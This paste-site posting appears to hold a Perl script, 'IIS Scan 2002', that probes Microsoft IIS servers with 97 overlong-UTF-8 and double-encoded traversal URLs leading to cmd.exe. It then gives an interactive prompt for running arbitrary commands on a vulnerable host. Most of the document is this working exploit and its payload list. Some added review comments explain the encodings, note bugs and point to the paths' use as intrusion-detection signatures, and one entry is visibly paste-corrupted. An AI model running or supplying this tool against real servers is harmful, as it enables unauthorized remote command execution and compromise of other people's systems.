jingobd

IIS Scanner (By: jingoBD)

Sep 26th, 2011
#!/usr/bin/perl -w
#
# IIS Scan 2002 By Thomas O'Connor, an edited version of Unicode Shell By B-Root.
# IIS unicode strings to exploit IIS web servers.
# First tries to get the IIS Server string.
# Scans for a usable Unicode URL in many different ways.
# Then allows a choice of which URL to use, including a URL of
# your own design, e.g. after copying cmd.exe to /scripts.
# Commands are executed via your choice of URL on the target
# server.
# The URL can be changed at any time by typing URL.
# The Webserver can be re-SCANned at any time by typing SCAN.
# The program can be QUIT at any time by typing QUIT.
# HELP shows this.
# Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ).
  16.  
  17.  
  18. use strict;
  19. use IO::Socket;
  20.  
# Globals Go Here.
# All state is shared through these file-scoped lexicals: the subroutines
# below communicate by assigning to them rather than through arguments and
# return values, so the order in which they are called matters.
my $host;       # Host being probed.
my $port;       # Webserver port.
my $command;        # Command to issue.
my $url;        # URL being used.
my @results;        # Results from server.
my $probe;      # Whether to display output.
my @U;          # Unicode URLS.

# URLS - Feel free to add here I did ;) tom.
# $U[0] always used for custom URL.
#
# Review note: every entry is a request path built from percent-encoded
# traversal sequences -- overlong UTF-8 encodings of '/' or '\' (%c0%af,
# %c1%9c, %e0%80%af, ...) and double-encoded forms (%255c, %252f, %%35%63)
# -- aimed at servers that decode the path only after checking it for
# "..".  A server that canonicalises before decoding is not affected.
# For a defender the list is mainly useful as a signature set: any of
# these substrings in an access log or IDS/WAF alert is a clear indicator
# of a traversal attempt, never a legitimate request.
$U[1] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[2] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[3] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[4] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[5] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[6] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[7] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[8] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[9] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[10] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[11] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[12] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[13] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[14] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+";
$U[15] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[16] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[17] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[18] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[20] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[21] = "/MSADC/root.exe?/c+dir";
$U[22] = "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[23] = "/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[24] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[25] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[26] = "/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[27] = "/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[28] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[29] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[30] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[31] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[32] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[33] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[34] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir";
$U[35] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[36] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[37] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[38] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[39] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[40] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[41] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[42] = "/c/winnt/system32/cmd.exe?/c+dir";
$U[43] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[44] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[45] = "/d/winnt/system32/cmd.exe?/c+dir";
$U[46] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
$U[47] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[48] = "/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir";
$U[49] = "/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir";
$U[50] = "/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[51] = "/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[52] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[53] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[54] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir";
$U[55] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[56] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[57] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir";
$U[58] = "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir";
$U[59] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[60] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir";
$U[61] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[62] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[63] = "/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[64] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[65] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[66] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[67] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[68] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
# NOTE(review): the next entry looks paste-corrupted (" HTTP/1.1" fragments
# are interleaved through it); as written it does not form a usable path.
$U[69] = "/msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir";
$U[70] = "/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[71] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[72] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir";
$U[73] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir";
$U[74] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir";
$U[75] = "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir";
$U[76] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir";
$U[77] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir";
$U[78] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir";
$U[79] = "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir";
$U[80] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir";
$U[81] = "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir";
$U[82] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir";
$U[83] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir";
$U[84] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir";
$U[85] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir";
$U[86] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir";
$U[87] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir";
$U[88] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir";
$U[89] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir";
$U[90] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir";
$U[91] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir";
$U[92] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir";
$U[93] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir";
$U[94] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[95] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[96] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
$U[97] = "/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir";
  129.  
  130. # SUBROUTINES GO HERE.
  131. &intro;
  132. &scan;
  133. &choose;
  134. &command;
  135. &exit; # Play safe with this .
  136.  
  137. sub intro {
  138. &help;
  139. &host;
  140. &server;
  141. sleep 3;
  142. };
  143.  
  144. # host subroutine.
  145. sub host {
  146. print "\nHost : ";
  147. $host=<STDIN>;
  148. chomp $host;
  149. if ($host eq ""){$host="localhost"};
  150. print "\nPort : ";
  151. $port=<STDIN>;
  152. chomp $port;
  153. if ($port =~/\D/ ){$port="80"};
  154. if ($port eq "" ) {$port = "80"};
  155. };  # end host subroutine.
  156.  
  157. # Server string subroutine.
  158. sub server {
  159. my $X;
  160. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  161. print "\nChecking if the server is IIS ...";
  162. $probe = "string";
  163. my $output;
  164. my $webserver = "something";
  165. &connect;
  166. for ($X=0; $X<=10; $X++){
  167.     $output = $results[$X];
  168.     if (defined $output){
  169.     if ($output =~/IIS/){ $webserver = "iis" };
  170.     };
  171. };
  172. if ($webserver ne "iis"){
  173. print "\a\a\n\nWARNING : I DONT THINK THE SERVER IS IIS.";     
  174. print "\nThis Server may not be running Micro\$oft IIS WebServer";
  175. print "\nand therefore may not be exploitable using the";
  176. print "\nUnicode Bug.";
  177. print "\n\n\nDo You Wish To Cont ... [Y/N]";
  178. my $choice = <STDIN>;
  179. chomp $choice;
  180. if ($choice =~/N/i) {&exit};
  181.             }else{
  182. print "\n\nOK ... It Seems To Be IIS.";
  183.     };     
  184. };  # end server subroutine.
  185.  
  186. # scan subroutine.
sub scan {
# Probe every entry of @U from index 1 upward (index 0 is reserved for the
# URL typed in by other()) with the command "dir", and report per index
# whether the response lines captured by connect() contain "Directory".
# Side effects: overwrites the globals $command, $url and $probe; @results
# is left holding the last response.  Calls the script's own exit sub when
# no entry matched.
# NOTE(review): connect() dies on a failed connection, so one unreachable
# port aborts the whole scan, and it never clears @results, so an empty
# reply leaves the previous probe's lines in place (a false-positive
# source when reading the per-index verdicts).
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nScanning Webserver $host on port $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;   # sends "GET $url$command" and refills @results
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                  $status = "vulnerable";
                  };
    };

if ($flag eq "0") {
print "\n$host is not vulnerable to Unicode URL Number $loop.";
}else{
print "\a\a\a\n$host IS VULNERABLE TO UNICODE URL NUMBER $loop !!!";
     };
};
if ($status eq "not_vulnerable"){
                print "\n\nSORRY $host is NOT Vulnerable to the UNICODE Exploit.";
                &exit;
                };
}; # end scan subroutine.
  218.  
  219. # choose URL subroutine.
sub choose {
# Ask which @U index to use and copy that entry into the global $url.
# An answer of 0 first routes through other(), which fills $U[0].
print "\nURL To Use [0 = Other]: ";
my $choice=<STDIN>;
chomp $choice;
# NOTE(review): the two re-prompts below recurse but do not return, so
# after a rejected answer execution continues here with the original
# $choice.  The bound also admits $choice == @U, one past the last entry,
# and the /g on a boolean-context match is unnecessary.  An empty line
# fails both rejects, satisfies "== 0" and is treated as "Other".
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "\nURL: HTTP://$host$url";
}; # end choose URL subroutine.
  230.  
  231. # Other URL subroutine.
  232. sub other {
  233. print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
  234. print "\nHTTP://$host";
  235. my $other = <STDIN>;
  236. chomp $other;
  237. $U[0] = $other;
  238. };  # end other subroutine.
  239.  
  240. # Command subroutine.
sub command {
# Interactive loop: read a line, dispatch the keywords QUIT/URL/SCAN/HELP,
# otherwise send the line as the command part of "GET $url$command".
# Keyword detection is a case-insensitive substring test, so any command
# that merely contains "url", "scan" or "help" triggers that keyword too.
# NOTE(review): <STDIN> is never checked for EOF; once input is exhausted
# $command is undef, no keyword matches, and the loop appears to repeat
# indefinitely, calling connect() on every pass.
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\nCommand :";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g; # encode whitespace as '+' for the query string.
print "HTTP://$host$url$command";
$probe = "command";
# This keyword test is case-sensitive, unlike the dispatch above, so an
# upper-case keyword still reaches connect().
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  # end command subroutine.
  258.  
  259. # Connect subroutine.
sub connect {
# Open a TCP connection to $host:$port, send one request whose shape is
# chosen by $probe ("command"/"scan": GET $url$command; "string": HEAD /),
# read the reply into @results and, for the "command" and "string"
# probes, print it through output().
# NOTE(review): the first response line (the HTTP status line) is consumed
# by the while() test and never stored, so @results holds line 2 onward.
# @results is not cleared beforehand, so an empty reply leaves the previous
# probe's lines in place.  No Timeout is passed to IO::Socket::INET, and a
# failed connection dies here instead of returning to the caller.
my $connection = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => "$host",
                PeerPort => "$port",
                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) {
            @results = <$connection>;
             };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  # end connect subroutine.
  280.  
  281. # output subroutine.
  282. sub output{
  283. print "\nOUTPUT FROM $host. \n\n";
  284. my $display;
  285. # if probe is a for server string display only first 10 lines.
  286. if ($probe eq "string") {
  287.             my $X;
  288.             for ($X=0; $X<=10; $X++) {
  289.             $display = $results[$X];
  290.             if (defined $display){print "$display";};
  291.             sleep 1;
  292.                 };
  293. # else print all server output to the screen.
  294.             }else{
  295.             foreach $display (@results){
  296.                 print "$display";
  297.                 sleep 1;
  298.                 };
  299.                           };
  300. };  # end output subroutine.
  301.  
  302. # exit subroutine.
  303. sub exit{
  304. print "\n\n\nYou should be happy i made this for testing so your server is secure#.";
  305. print "\nCya!";
  306. print "\n\n\n";
  307. exit;
  308. };
  309.  
  310. # Help subroutine.
  311. sub help {
  312. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  313. print "\n IIS Scan 2002 by Thomas O'Connor.";
  314. print "\n www.thomasoconnor.net";
  315. print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
  316. print "\n A Unicode HTTP exploit for IIS WebServers.";
  317. print "\n";
  318. print "\n First checks if the server is IIS.";
  319. print "\n Scans for usable Unicode URL in 97 different ways.";
  320. print "\n Then allows choice of which URL to use including an URL of";
  321. print "\n your own design eg. After copying cmd.exe to /scripts.";
  322. print "\n Commands are executed via your choice of URL on the target";
  323. print "\n server.";
  324. print "\n ";
  325. print "\n URL can be changed at anytime by typing URL.";
  326. print "\n The Webserver can be re-SCANed at anytime by typing SCAN.";
  327. print "\n Program can be QUIT at anytime by typing QUIT.";
  328. print "\n HELP prints this ... ";
  329. print "\n Have Fun Tom ( Vline of irc.dal.net #theboxnetwork ). !";
  330. print "\n\n\n";
  331. }; # end help subroutine.
  332.  
  333.  
# Thomas O'Connor's first public production, #theboxnetwork irc.dal.net .
# I pieced this together for admins to test their own IIS servers with a mass number of IIS strings.
# IIS Scan 2002, edited version of Unicode Shell by Thomas O'Connor [Vline of Dalnet] http://www.thomasoconnor.tk webmaster@mail.ie #theboxnetwork irc.dal.net.
# Once again, thanks to B-Root for his code; I really just updated the IIS strings.